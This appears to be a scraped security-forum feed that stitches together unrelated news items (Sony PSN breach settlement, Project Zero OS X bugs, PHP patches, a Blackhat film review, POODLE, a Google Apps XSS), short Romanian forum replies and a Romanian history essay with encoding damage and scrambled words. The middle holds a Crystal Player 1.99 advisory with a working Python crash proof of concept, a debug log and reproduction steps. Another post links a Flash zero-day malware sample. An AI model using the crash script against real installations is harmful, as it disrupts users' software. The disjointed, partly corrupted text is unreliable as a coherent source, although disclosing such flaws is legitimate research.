Aerosol

Millions of PSN gamers, who were hit by a massive data breach on Sony's Playstation network back in 2011, are finally being offered the opportunity to claim compensation from the company. Stateside victims of the hack attack – PSN, Qriocity and Sony Online Entertainment subscribers who held an account before 15 May 2011 – have been encouraged to file an online form as part of a settlement deal to end a class action lawsuit brought against the Japanese tech giant.A number of claims can be submitted by U.S. netizens affected by the assault on Sony's computer network systems. Victims can either claim one free game, up to three themes or a free subscription to Playstation Plus for three months for those subscribers not already signed up to that option. While those affected by identity theft can claim up to $2,500 in compensation. Sony, which offered a $15m settlement deal to PSN gamers in July last year, said: The proposed settlement offers payments equal to credit balances (if applicable credit balance is $2 or more) in inactive accounts, game and online service benefits for holders of active accounts, and reimbursements for certain out-of-pocket expenses from any identity theft proven to have resulted from the intrusions. In the UK, Sony was slapped with a £250,000 fine by the Information Commissioner's Office, after it concluded that the Data Protection Act had been violated following the 2011 hack attack. The personal info of millions of Brits – including names, addresses and account passwords – were stolen by malefactors who infiltrated Sony's PlayStation Network systems. In January 2013, Blighty's data cops concluded that the breach of around 77 million gamers could have been prevented if Sony had adequate security measures in place, such as hashing and salting log-ins and keeping system patches up to date. Despite that admonishment, Sony has refused to accept any responsibility for the attack. ® Source

Telecoms security has been in and out of the headlines for almost two years now, ever since patriot/traitor/hero/villain (delete as your opinion dictates) Edward Snowden revealed the PRISM campaign and the rest in 2013. We've since learned that GCHQ has a pretty tight grip on the communications flowing around the UK and the rest of the world. So you'd think the folks at the top at GCHQ and the government would be adept at keeping their own comms secure. Not so, it seems. Sneak was amused to read that David Cameron received a prank phone call from someone who managed to bypass the switchboard security (the mind boggles as to how) and was given the mobile phone number of the head of GCHQ, Sir Robert Hannigan. Cameron explained that the hoax call took place while he was out for a walk, and was told, presumably by a government switchboard operator with a heavy case of 'Sunday afternoon lull', that he was being put into a conference call from Hannigan. Cameron, however, was not taken in and said he was immediately suspicious when the caller said sorry for 'waking him up' at the start of the call. Sneak knows politicians are often characterised as lazy, feckless types, but even he wouldn't have thought Cameron was in bed at 11am on a Sunday. "I thought that was strange as it was eleven o'clock in the morning," Cameron said, with James Bond-like calm. He then confirmed that he ended the call without revealing any national security information, such as Trident's tactical nuke launch codes, his inner thigh measurements or the location of the Holy Grail. Phew. Source

Ma bag la un joc si asa imi trece si acea stare nasola. Ma mai uit pe YT la diferite filmulete sau pur si simplu ma culc.

Update: OK Apple, your turn. After raising a ruckus with the disclosure of three unpatched Windows vulnerabilities, Google’s Project Zero research team did the same this week with a trio of security issues in Apple OS X. Project Zero imposes a 90-day deadline on vulnerabilities it reports to affected vendors; if a patch is not delivered inside that time frame, details are automatically made public via its external database. The respective OS X bugs were reported to Apple in late October and 90-day deadlines began expiring this week. The Project Zero disclosures also come with proof-of-concept exploit code. A request for comment from Apple was not returned in time for publication. Published reports indicate that the vulnerabilities have been patched in Yosemite 10.10.2, which is in beta. The vulnerabilities affect different components of Apple’s flagship operating system, and range from memory corruption, kernel code execution and a sandbox escape. All three require some kind of local access to exploit. The sandbox escape vulnerability, OS X networkd “effective_audit_token” XPC type confusion sandbox escape as labeled by Google, may have been mitigated starting in the Yosemite version of OS X. Google refers to a separate advisory for those details. In its disclosure on Tuesday, Google said that the networkd system daemon implements an XPC service API which communicates on behalf of an application. Project Zero said that XPC messages using get parameters are used without checking the type of returned value. This allows messages to reach functions outside the sandbox, Google said. One day later, the 90-day deadline expired on an OS X IOKit kernel execution vulnerability. “Calling IOConnectMapMemory on userclient type 2 of “IntelAccelerator” with memory type 3 hits an exploitable kernel NULL pointer dereference calling a virtual function on an object at 0x0,” Google said in its advisory. Part of this disclosure originally included a kernel ASLR bypassed, but that was patched in Yosemite 10.10, Google said. The third disclosure happened yesterday and is another OS X IOKit kernel memory corruption vulnerability. Google said a Bluetooth device must be connected to exploit this bug, which is due to a bad bzero in IOBluetoothDevice. “Userspace can modify the size in shared memory leading to the bzero writing a controlled number of NULL bytes off the end of the buffer,” the advisory said. Project Zero’s automated disclosures are the latest salvo in the industry’s eternal debate over the sharing and distribution of vulnerability details. Microsoft fought back after Google spilled the beans on a trio of its unpatched bugs, one of which Google refused to sit on for an additional two days before Microsoft was to release a patch. Source

Several new versions of PHP have been released, fixing a number of security vulnerabilities and other bugs in the popular scripting language. PHP 5.6.5 is the newest version of the language, and it has patches for a handful of vulnerabilities, including a use-after-free flaw that could lead to remote code execution in some cases. “Sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping’s length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping,” the description of the vulnerability says. There are a few other security vulnerabilities fixed in version 5.6.5, as well. One involves an initialized pointer in Exif. Another is a fix for a vulnerability that initially was patched in December. Apparently the patch did not completely fix the problem, which was identified by researcher Stefan Esser. The vulnerability is another use-after-free bug. “There is a small but important difference to the patch I sent on 10th December. You use zend_symtable_find instead of zend_hash_find from my patch. Because of this change the fix is incomplete. It now detects attacks that try to replace a key like “AAA”, but it does not fix attacks where the key is a numerical string like “123”. The reason for this is that we do not want integer keys in objects. That is why the code was added in the first place,” Esser said in an email to the PHP maintainers. “The object properties are therefore inserted via zend_hash_update, instead of zend_symtable_update. Therefore something like “123” will be inserted as a string and not as a numerical 123. On the attempt to do the overwrite attack you now check with zend_symtable_find(). This function will turn the “123” into a numerical “123” and therefore not see that it is already there. The protection will not be executed and therefore the attack works in the same way as before.” Source

Spoiler alert: Those who haven’t yet seen the film, but plan to, please skip to the summary. Hollywood has tried to depict cyberwarfare and “hacking” many times. Hackers and The Net are just a couple of examples. Blackhat, a Michael Mann directed film, debuted in wide theatrical release on January 16th. Chris Hemsworth plays Nicholas Hathaway, a man who was serving time in prison for some sort of computer related crime. Viola Davis plays FBI Agent Carol Barrett. Leehom Wang plays Captain Dawai Chen, an officer of China’s cyberwarfare unit. Wei Tang plays his sister, Lien Chen. Lien’s character is central to the movie, she helps with the investigation and (spoiler alert!) falls in love with Nicholas. Here’s a quick synopsis. A nuclear power plant in Chai Wan, Hong Kong is attacked with a remote access tool (RAT.) Through the RAT, the plant’s programmable logic controllers are tampered with, causing the coolant pumps to overheat and explode. People within a ten kilometer radius of the plant are evacuated. Captain Dawai Chen has to find the culprit. He discovers, through his sister Lien and FBI Agent Carol Barrett, that the RAT contains code he wrote himself years ago, collaborating with Nicholas Hathaway. Nicholas was in prison, and Agent Barrett helped to release him, because of course, Nick’s help is crucial to the investigation. Coincidentally, the Mercantile Trade Exchange in Chicago is attacked with the same RAT, and soy prices skyrocket. It’s a commodities trading disaster! That incident makes the Chinese and American officials willing to collaborate. Our characters spend time in the US, travel to various locations in China, and eventually they travel to Malaysia and Indonesia as well. There’s lots of explosions, lots of super intense gunfire, one of the main characters is murdered while in his car, and of course, that explodes as well. I went into the movie theater with very low expectations for the film’s technical accuracy. Actually, Hollywood has done much worse when it comes to depicting cyberwarfare and information security attacks in general. There were highlights and lowlights. First, I’ll explain what I think the film got right. Accuracies It was quite correct to state that a RAT can be used to wreak havoc, such as causing a nuclear disaster. And malware has attacked nuclear facilities before, such as when Stuxnet hit Iran. Some of the GNU/Linux BASH shell commands were accurate. I saw a “sudo” here and there. It’s possible for the Chicago Mercantile Exchange to be attacked through a RAT. Yes, IPSes and firewalls are indeed network security devices. Kudos! Correct usage of the right kind of proxy servers can make tracing a blackhat’s activity a lot more difficult. What really impressed me was that at one point, someone filebound a keylogger to a PDF in order to acquire a password. The PDF was for the user to review their organization’s password policy when he was instructed to change his password. This was the very first time in American film and television that I’ve seen filebinding and software keylogging used properly, and the social engineering it may require to be successful. In NCIS and Hackers, they make it seem like “hacking” requires ultra fast typing. Supposedly, the way to “hack” or defend against a “hack” is to type at 327 words per minute! The faster the typing, the more hackerific the hacking! I didn’t see any of that BS in Blackhat. Very good. Now, here’s where Blackhat errs. Inaccuracies In the first scene that Chris Hemsworth’s Nicholas Hathaway appears in, he’s interrogated in prison about something he did. The interrogater says, “You used this to open a command line?” As if opening a command line on a machine is some super impressive, devious feat. Notice that he didn’t say “acquire root access.” Just “open a command line.” Groan… Although this has nothing to do with information security, I noticed that Hong Kong and the Chinese cities in the movie were completely devoid of air pollution. Beijing and other Chinese cities are notorious for having horrific air quality, to the extent that it even interferes with landings and departures at Beijing’s international airport. Absolutely all of the code displayed in the movie was hexidecimal. Or random combinations of letters and numbers, sometimes it was difficult to tell. I highly doubt that the coders in the movie work purely in assembly. Especially when they develop applications like RATs. An NSA information security professional was extremely perplexed that his data center was penetrated, because they have firewalls and IPSes. Those things are bulletproof, don’t ya know? Likewise, checking physical security amounted to verifying that the door to the server room was protected by a fingerprint scanner, and that’s it. A monitoring device was put on Nick for his release. Fair enough. It was controlled by an Android app. One of the settings was for how frequently the app checked the geolocation of Nick’s monitoring device. Nick was able to grab the Android phone at one point and change its settings so that it checked his location a lot less frequently. Why would the backend of a convict’s monitoring device be so insecure, physically and otherwise? Apparently, you can do a “whois” on both usernames and IP addresses. That’s news to me. On a related note, once you’ve found an IP address, you’ve definitely got someone! It’s not like dynamic IP addresses and IP address spoofing exist, or anything like that. Also, that contradicts how the movie shows that proxy server use can make attackers more difficult to find. In one scene, Nick and Lien eat at a Korean restaurant that’s somewhere in the United States. Hangul (Korean) characters can be seen here and there, but for some reason, there are Chinese characters to be seen as well. All that funny Asian writing is all the same, isn’t it? Anyway, at some point, Nick goes to the restaurant’s backroom, where there’s a PC with a couple of monitors. I could tell that Nick didn’t boot an OS from a USB stick or DVD. He didn’t use any external media, so he couldn’t have loaded applications from them either. A restaurant’s PC will typically have standard OS applications, financial software, and some sort of POS backend, without much else. I’d be surprised to find something like Wireshark or Nessus on a restaurant’s PC. Nonetheless, within mere seconds of acquiring physical access to the PC, Nick runs some pretty heavy duty network penetration tools. Black Widow is a fictional Nessus/OpenVAS-like program. Or perhaps it’s something like Kali Linux. It’s a super secret tool that only the FBI is supposed to have access to! As if these sorts of things are only developed by and used by the FBI! At one point, Nick and Lien are in the middle of a rural part of Malaysia. It’s really, really rural. There’s just a very tiny village there, and that’s it. Somehow, Lien is able to whip out her laptop and enjoy instant network connectivity. Maybe she’s using satellite technology, but that’s doubtful. FBI Agent Carol Barrett assures her colleagues that the Chinese can be trusted because “they’ve been cooperative so far.” I’ve written about Chinese cyber attacks on the United States before. Such incidents have been very frequent, and very recent. The movie takes place in March 2015. There was Operation Aurora in late 2009 that targeted Google and Adobe. The Office of the National Counterintelligence Executive reported Chinese cyber attacks on American military servers to Congress in November 2011. Backdoors have been found in devices sold to the United States and manufactured by Huawei and ZTE, both of which are closely tied to the Chinese government. That’s just the tip of the iceberg. The FBI should be well aware that collaborating with the Chinese to investigate cyberwarfare is a bad idea. There are probably intelligence types who laughed while watching this movie. Summary It’s obvious to me that some effort was made to make Blackhat technically accurate. But clearly, there were still blunders. As far as the American and Chinese collaboration in the film is concerned, I think that can be explained with three words: International box office. More and more, major Hollywood studios are relying on it to make movies that cost $70 to 150 million profitable. For instance, by Hollywood blockbuster standards, Pacific Rim didn’t do very well in the United States. But it ended up making a lot of money anyway, largely from Chinese moviegoers. Hollywood looks at China with dollar signs in her eyes. So, it was an absolute must that the Chinese government was depicted positively in the movie. Compared to previous attempts, Blackhat is an improvement in how information security and computer technology is portrayed in fiction. But it’s only a minor improvement. Source

Felicitari @1488 sa ne anunti cand ai primit reward-ul!

@wtf ) On:// Bine ai venit!

Salut si bine ai venit!

Malware don't need Coffee: Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK Adobe Security Bulletin VirusTotal Scan: https://www.virustotal.com/en/file/f5458eb4b0d7c18519bbf5fd92437485bff31f9abc6870beb4e8dc327cd24192/analysis/1422090857/ Download Pass: infected Source

Am ales sa postez asta pentru ca are legatura cu noi toti! ======================================================= 24 IANUARIE, Mica Unire. 24 Ianuarie este data la care s?rb?torim, an de an, din 1859 încoace, un mare eveniment al istoriei poporului român, ?i anume Unirea Principatelor, cunoscut? ca „Mica Unire„. Unirea Principatelor reprezint? unificarea vechilor state Moldova ?i Tara Româneasc? ?i este strâns legat? de personalitatea lui Alexandru Ioan Cuza ?i de alegerea sa ca domnitor al ambelor principate la 5 ianuarie 1859 in Moldova si la 24 ianuarie 1859 in Tara Romaneasca. Totusi, unirea a fosunirea principatelor romane 1t un proces complex, bazat pe puternica apropiere culturala si economica intre cele doua tari. Procesul a inceput in 1848, odata cu realizarea uniunii vamale intre Moldova si Tara Romaneasca, in timpul domniilor lui Mihail Sturdza, respectiv Gheorghe Bibescu. Deznodamantul razboiului Crimeii a dus la un context european favorabil realizarii uniriIoan Votul popular favorabil unirii in ambele tari, rezultat in urma unor Adunari Ad-hoc in 1857 a dus la Conventia de la Paris din 1858, o intelegere intre Marile Puteri prin care se accepta o uniune mai mult formala intre cele doua tari, cu guverne diferite si cu unele institutii comune. La inceputul anului urmator, liderul unionist moldovean Alexandru Ioan Cuza a fost ales ca domnitor al Moldovei si Tarii Romanesti, aducandu-le intr-o uniune personala. In 1862, cu ajutorul unionistilor din cele doua tari, Cuza a unificat Parlamentul si Guvernul, realizand unirea politica. Dupa inlaturarea sa de la putere in 1866, unirea a fost consolidata prin aducerea pe tron a principelui Carol de Hohenzollern-Sigmaringen, iar constitutia adoptata in acel an a denumit noul stat Romania. Recunoasterea internationala a Unirii Actul istoric de la 24 ianuarie 1859 reprezenta primul pas pe calea infaptuirii statului national roman unitar. Impusa sub o puternica presiune populara, cu deosebire la Bucuresti, alegerea ca domn al Tarii Romanesti a lui Alexandru loan Cuza avea sa-si gaseasca o confirmare deplina la marea manifestare prilejuita de sosirea alesului natiunii in capitala munteana, scrie juristpedia.ro. Cea mai stringenta problema era recunoasterea internationala a alegerilor. Faptul implinit la 24 ianuarie 1859 era considerat de Poarta si de Austria drept o incalcare a Conventiei de la Paris. Situatia creata in cele doua Principate urma sa faca, de altfel, obiectul unei noi Conferinte internationale, care se deschidea la Paris, la 26 martie/7 aprilie – 25 aug./6 sept. Misiuni speciale, conduse de persoane apropiate lui Alexandru IOAN Cuza, au vizitat capitalele Marilor Puteri garante si au reusit sa castige sprijin pentru cauza romaneasca. Inca in a doua sedinta a Conferintei (1/13 aprilie) Franta, Rusia, Anglia, Prusia si Sardinia au recunoscut dubla alegere. Imperiul Otoman si Austria insa tergiversau; mai mult, se afla ca se punea la cale o interventie militara peste Dunare. Alexandru IOAN Cuza raspunse energic. La 20 aprilie, la Floresti, intre Ploiesti si Campina, armata moldo-munteana era concentrata spre a face fata oricarei situatiIoan Dupa alte amenintari, sub presiunea celorlalte puteri garante, Poarta a acceptat oficial, odata cu Austria, in a 3-a sedinta a Conferintei de la Paris (25 august/7 septembrie), sa recunoasca, la randul ei, dubla alegere. Detensionarea situatiei, atat in relatiile cu Imperiul Otoman, cat si cu cel Habsburgic, il determina pe domn sa ordone inchiderea taberei de la Floresti (1 septembrie 1859). Astfel implinita recunoasterea situatiei de fapt, impusa la 24 ianuarie, obiectivul imediat urmator era acceptarea de catre puterile garante a Unirii depline. Fara a astepta verdictul altor reuniuni internationale, Alexandru IOAN Cuza a trecut la unificarea aparatului de stat, remediind din mers consecintele hotararilor adoptate prin Conventia de la Paris. Misiunile diplomatice ale Principatelor la Constantinopol erau reunite inca in cursul anului 1859 (martie), cu Costache Negri, recunoscut chiar de catre Poarta, drept unic reprezentant al celor doua tarIoan Unificarea armatei incepea cu deplasari de unitati militare moldovene, la Bucuresti si muntene, la Iasi; tabara de la Floresti s-a bucurat de o comanda unica. In cursul anului 1860, statele majore, instructia, administratia si intendenta au fost asezate sub o singura autoritate, iar aceeasi persoana – generalul Ion Emanoil Florescu – a fost numita in functia de ministru de razboi in ambele tarIoan La serviciul telegrafului moldovean si muntean este numit ca inspector general Cezar Librecht. La Focsani, nu fara dificultati, isi incepuse activitatea Comisia Centrala care, potrivit Conventiei de la Paris, trebuia sa elaboreze legile, comune celor doua tarIoan In cei trei ani de activitate (1859- 1862) din proiectele sale au fost aprobate de Adunarea, electiva si promulgate de domn doar cele referitoare la Curtea de Casatie si la domeniul funciar (care traducea in fapt principiul egalitatii fiscale). Proiectul de Constitutie nu a fost aprobat insa de domnitorul Cuza, Comisia Centrala din Focsani fiind desfiintata in februarie 1862. Raporturile cu acele puteri garante care se aratau ostile unirii sau care jucasera, in trecut, un rol important in viata Principatelor (Rusia, in anii „protectoratului”) au fost bazate, inca din primii ani ai domniei lui Alexandru IOAN Cuza, pe respectarea nestirbita a autonomiei tarii nou-constituite. Astfel, prezenta militarilor otomani va fi categoric interzisa, iar Poarta va fi obligata, in vara anului 1860, sa renunte la pasapoartele sale solicitate calatorilor romani, in mai multe situatii supusii Imperiului fiind retinuti pentru ca au produs diverse neoranduielIoan Austria, vehement dusmanoasa, a trebuit sa accepte ca legile statului roman sunt valabile si pentru locuitorii cezaro-craiesti aflati aici cu afacerIoan Maghiarii si polonezii, care voiau sa ramana in Principate sau sa tranziteze spre alte regiuni, sunt protejati de guvern si de domn in spiritul dreptului la azil politic, oferindu-li-se la plecare chiar mijloacele necesare. Franta, apoi Rusia, Italia si Prusia erau de acord cu unirea deplina. Alexandru IOAN Cuza astepta hotararea Conferintei de la Constantinopol convocata in acest scop. Cum era de asteptat, inca din prima sedinta Poarta a cerut dreptul de interventie in Principate, in cazul unor noi incalcari ale Conventiei de la Paris, iar Austria a admis unirea doar pe durata domniei lui Alexandru IOAN Cuza. La inceputul lunii noiembrie 1861 firmanul Unirii era prezentat, dar in conditii considerate, in tara, inacceptabile. Fermitatea lui Alexandru IOAN Cuza, reactia energica Camerelor si a guvernelor, pozitia intransigenta a lui C. Negri si atitudinea favorabila a majoritatii Marilor Puteri garante si-au facut in cele din urma efectul. La capatul Conferintei, Poarta a elaborat un nou firman (4/16 decembrie 1861) prin care a renuntat la conditiile anterior solicitate, Austria pastrandu-si vechea pozitie. Sirul de reforme initiate de Cuza si venirea mai apoi pe tronul Principatelor Unite a domnitorului Carol I, care se bucura atat de sprijinul Frantei cat si cel al Prusiei, a facut ca actul de la 1859 sa fie ireversibil. Din 1866, potrivit Constitutiei promulgate la 1 iulie, Principatele Unite incep sa se numeasca oficial Romania. Source

Nu cred ca o astfel de categorie isi are rostul aici, nu trebuie incurajat trolling-ul.

Document Title: =============== Crystal Player 1.99 - Memory Corruption Vulnerability Date: ============= 21/01/2015 Vendor Homepage: ================ http://www.crystalreality.com/ Abstract Advisory Information: ============================== Memory Corruption Vulnerability on Crystal Player 1.99. Affected Product(s): ==================== Crystal Player 1.99 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file. Attackers can crash the software local by user inter action over mls (playlist). --- DEBUG LOG --- ///registers EAX 00000000 ECX 0006FE24 EDX 0006FE24 EBX 0013014C ESP 0006F300 EBP 00060041 ESI 00FF4A00 EDI 00000001 EIP 0040F933 Crystal.0040F933 C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 1 FS 003B 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008) EFL 00010296 (NO,NB,NE,A,S,PE,L,LE) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 --- ERROR LOG --- Crystal+0xf933: 0040f933 8b5510 mov edx,dword ptr [ebp+10h] ss:0023:00060051=???????? 00060051 doesnt exist in the program aka not allowed .. so memcopy fails... EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 0040f933 (Crystal+0xf933) Access violation when reading [00060051] Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local attackers with userinteraction ... #!/usr/bin/python buffer = "A"*30000 filename = "Crash"+".mls" file = open(filename, 'w') file.write(buffer) file.close() print "[] Successfully MLS Created []" How to perform: ======================= 1) Open Immunity Debugger and attach Crystal Player 1.99 2) Run it, Now move .mls file that we generated by our python script to the player 3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist. When you perform above steps so application will crash. Analyze it on Immunity. Solution - Fix & Patch: ======================= Restrict working maximum size & set a own exception-handling for over-sized requests. Security Risk: ============== The security risk of the vulnerability is estimated as medium because of the local crash method. Authors: ================== Kapil Soni (Haxinos) Source

Introduction The virtual space has over time become something of real importance for business, politics, work, communities and communications. In becoming gradually more and more dependent and addicted to the Internet, individuals, companies, organizations and governments have raised (or are raising) awareness of being intimately vulnerable to attacks and threats of various types. Not only can the Internet potentially be used “as it is” to conduct offensive actions that are born and die in cyber-space, but it can also be a great way to conduct complementary or parallel actions to physical threats, such as, for example, ideological/religious propaganda and information gathering of sensitive targets. Analyzing terrorist actions conducted in the past, we saw a massive use of electronic means, and, in consideration of the fact that through such means we can ideally act “without territorial boundaries“, it is certainly possible to say that the Internet ties the terrorists together. Besides the fact that, by the analysis of seized media in hot scenarios like Afghanistan, Syria and Iraq, were brought to light real intelligence campaigns conducted through its use in preparations of complex attacks. In addition, it is not difficult to imagine that even with not so high skills, the Internet can provide a good level of anonymity, control and coordination points, as well as a multitude of techniques for the exchange of sensitive information (steganography, encryption, encoding, words schemes, etc.). This article is intended to treat the generic elements of what is commonly called “cyber-terrorism” and the risks associated with the fact that today it really can occur. Definition and Concepts The term cyber-terrorism was first used by Barry Collin, a security researcher and an intelligence expert. He simply called “cyber-terrorism” as the convergence of the terms “cybernetic” and “terrorism“. Today, a definition popularly used to describe it is “the use of Internet and/or ICT networks against one or more critical national infrastructures (energy, transport, communications, military, economy, finance etc. etc.) in order to hit or intimidate a society and its peoples causing casualties or injuries for ideological, political or religious reasons“. From this definition, cyber-terrorism can be considered in some ways along the lines of physical acts of terrorism, with which it shares some essential features. One of the keywords used in discriminating actions of cyber-terrorism from other types of similar actions in cyberspace is the “motivation” that pushes the attackers. An action with a clear political/ideological motivation or with obvious notations related to religion are to be considered more likely acts of cyber-terrorism. The same type of action aimed at mere economic gain (through extortion or blackmail) would be more easily placed within the various layers of cybercrime (organized and not). Networked Agents (they are online) But how, commonly, are computing and multimedia resources currently used for pro-terrorism and/or pro-cyber-terrorism campaigns? Is it possible to identify key areas in which are concentrated their greatest online efforts now? One of these, among the most banal and obvious even though among the most disconcerting, is the “glorification of violence“. The glorification of violence and the push to emulate bloodthirsty acts is definitely one of the first goals for which the telematic medium is used today by terrorist groups. Beyond that, however, the Internet has become a great conduit for disseminating messages and resources targeted to the training of recruits and their indoctrination. In this regard, very particular attention must be given to social networks and sites devoted to meeting, such as chat rooms or forums. Another aspect certainly not to be underestimated is the so-called “online funding research“. Recently it was discovered that some online donations to apparent benevolent institutions went instead to fund organizations in the Middle East led by terrorist groups. There’s also a very wide use of the Internet for the dissemination of material devoted to “digital training“. Audio, video, online manuals and web content are increasingly devoted to the self-made training of new recruits. It is pretty clear then that the potential of the digital world is endless when viewed under this light. Besides the activities described above, also to be taken into account are the benefits coming from the capabilities of “active” information gathering actions, which are not limited to passively seek information, but which aim to get it through campaigns of affiliate hacker groups. Thanks to them, in close relation to their capacity of course, it is easy to assume that the quantity and especially the accuracy of the information collected is certain to increase, thereby increasing the “value” (may be better… the dangerousness) of any terrorist group. If we also think of the increased capacity of securely sharing this information, things seem even more threatening. If, in fact, the attack of 11/09 has seen a design largely based on an exchange of emails totally “in clear”, the terrorist groups have over time developed means and tools that are much more sophisticated to ensure the confidentiality of their communications. One of the best known is certainly the “Mujahideen Secrets”, widely used by Al-Qaeda until 2007 for the protection of online and mobile communications. Recently, however, other software have been developed over this, especially after the “leak” of Edward Snowden of June 2013, such as “Tashfeer al-Jawwal“, a platform for the use of encryption developed by the “Global Islamic Media Front (GIMF)” or l “Amn al-Mujahid“, a software for the use of strong encryption developed by the “Al-Fajr Technical Committee“, an organization traditionally linked to Al-Qaeda. The cyber-space, therefore, appears tied hand in glove with each stratum of the organization of terrorist groups, and the Internet is the backbone of this dimension that today is so strong that it is difficult even only to imagine the presence or evolution of such organizations without it. The Risk Today The theme of the real risk today about cyber-terrorism is certainly due to disagreements in opinions among the experts. Of course, it is very easy to imagine that a government technologically abreast and in possession of specific “cyber-attack” units has on its side both the skills and the motivation to develop very effective digital weapons to be used against sensitive targets. But what could we say about the capabilities of cyber-terrorists in a cyber-war against an international community? According to the definition above, can we attribute such advanced capabilities in the digital world to such groups? Despite the rather simple fact to assume (or better, to recruit) an experienced hacker, or perhaps a group of them and rely on the support of affiliated “software house” (see sections above), this does not mean to pursue a program of “digital weaponry” comparable to that of some governments. How can we identify the notations a real program of cyber-sabotage? The variables involved in this case are many, but as an evaluation term, we can consider by a practical point of view a hypothetical cyber-attack against a target among the most desirable to the eyes of a cyber-terrorist: an electrical power plant. So, what would I need to complete a similar cyber-attack with a good chance of success? One of the first things to consider, according to common experience, is the assured presence of redundant systems in such infrastructures. An effective pure cyber-terrorist attack therefore should provide adequate coordination and probably the use of very sophisticated malware. In this regard, therefore, would be needed very high technical skills, good movement in the “underground” to get information about the software in use, weaknesses in the infrastructure, exploit codes, as well as a good availability of money. All this without considering that if we are going to work at certain levels, a proper hardware will be needed to ensure adequate computing power, storage space and fast lines. Another factor not to be underestimated is certainly the human one. In fact, it seems unlikely that experienced and highly trained ICT security specialists will enlist in the ranks of these organizations. And even if this were to happen, such individuals would face many problems related to their small number. It takes indeed long time in the development of dedicated malware to reach a good level of reliability in performing the operations expected, as well as to put together all the information about the more critical targets and their vulnerabilities. All this now seems beyond the means of even the largest and economically advantaged terrorist organization. In addition, if we make a comparison with the physical world, the operations in cyberspace, as well as being much more complex to organize, are also less spectacular in the mind of the community. Even talking about internal growth and “in house” training, it’s certainly much easier to instruct at the use of weapons compared to even a “basic” training in cyber-security. Conclusion Although considered potentially devastating and almost certainly with an influence on a rather extensive geographical area, today the probabilities of a pure cyber-terrorist attack are quite low in my opinion. For sure, this specific threat is more likely to be associated with hostile governments that own the means and the interests to develop high offense capabilities in the digital world. This obviously does not means that the threat of cyber-attacks sourcing from terrorists is absent. Most probably indeed it is to be expected that they will use them as a complement of physical terrorist actions in the near future. Imagine, for example, the consequences of a denial of service attack against the emergency systems after an explosion in a subway. They would be catastrophic. In addition we have to consider that the use of modern information technology, the development of software that is very effective in ensuring the confidentiality of communications, as well as hacking techniques used for collecting informations about targets and persons are gradually increasing between terrorist groups, raising exponentially their skills of organization, coordination and consequently, their dangerousness. Source

Felicitari @Byte-ul asa vor disparea Useri care comentau la fiecare post aiurea.

Google, among several security organizations, recently announced a vulnerability in the SSL protocol, particularly SSL version 3. SSL is used to secure connections between a client and server to prevent eavesdropping, and that the data has not been tampered. SSLv3 is an old version of the SSL protocol, dating back to 1996 and debuted with Netscape Navigator. While a very old version of SSL, it is still widely supported by browsers and servers today. According to SSL Pulse, 98% of web servers support SSLv3 in October 2014. Fortunately more secure replacements for SSLv3 have existed for a long time, such as TLS 1.0. Since TLS has been widely adopted for several years now, nearly all browsers will opt to use TLS instead of SSLv3. The POODLE vulnerability is a flaw in the design of the algorithm, not a bug in a particular software implementation like Heartbleed. POODLE is similar to the BEAST attack, which targets SSLv3 and ciphers that use cipher block chaining (CBC). POODLE (Padding Oracle On Downgraded Legacy) targets users by being active on the network, similar to a man-in-the-middle attack. With the attacker having access to the network, he can force the SSL connection to the lower-grade protocol SSLv3 by interrupting the SSL handshake. Once the attacker has forced the connection to use SSLv3, he can attack the client and force characteristics of the connection that make it predictable. One way an attacker might accomplish this is with a Cross Site Scripting, or XSS. If the attacker is successful, he will be able to steal sensitive information such as authentication cookies. The simplest and most effective way to address this is to completely disable support for SSLv3. This is recommended for server administrators to ensure no clients connect to their resources using old versions of SSL. In another blog post we detailed how to lock down and remove older versions of SSL from the server. For desktop administrators, disable support for SSLv3 at the browser level. This can be accomplished with Group Policy for Internet Explorer. Since TLS is widely deployed, turning off SSLv3 support will have a small impact on most people. Internet Explorer 6 remains the only browser that does not support anything better than SSLv3. As support for SSLv3 is removed over the coming weeks, IE 6 users will have more difficulty using secure websites. IE 6 does support TLS 1.0, however is off by default. Enabling TLS 1.0 in IE 6 can be used as a short term work around until a newer version of IE is installed. Source

@z4rk du-te cat mai repede la politie si reclamal, daca scapa cu un telefon de la tine un telefon de la x, y, z. maine trece la furt, viol, crima si cine stie ce dracu... Nu il proteja (daca tu stii de el si nu faci nimic e ca si cum ai fi complicele lui ).

A critical cross-site scripting (XSS) vulnerability in the Google Apps administrator console allowed cyber criminals to force a Google Apps admins to execute just about any request on the https://admin.google.com/ domain. The Google Apps admin console allows administrators to manage their organization’s account. Administrators can use the console to add new users, configure permissions, manage security settings and enable Google services for your domain. The feature is primarily used by many businesses, especially those using Gmail as the e-mail service for their domain. The XSS flaw allowed attackers to force the admin to do the following actions: Creating new users with "super admin" rights Disabling two-factor authentication (2FA) and other security measures from existing accounts or from multiple domains Modifying domain settings so that all incoming e-mails are redirected to addresses controlled by the attacker Hijack an account/email by resetting the password, disabling 2FA, and also removing login challenges temporarily for 10 minutes This new zero-day vulnerability was discovered and privately reported by application security engineer Brett Buerhaus to Google on September 1 and the company fixed the flaw within 17 days. In exchange for the report, Google paid the researcher $5,000 as a reward under its bug bounty program. According to the researcher, when users access a service that hasn’t been configured for their domain, they are presented with a "ServiceNotAllowed" page. This page allows users to switch between accounts in order to log in to the service. However, 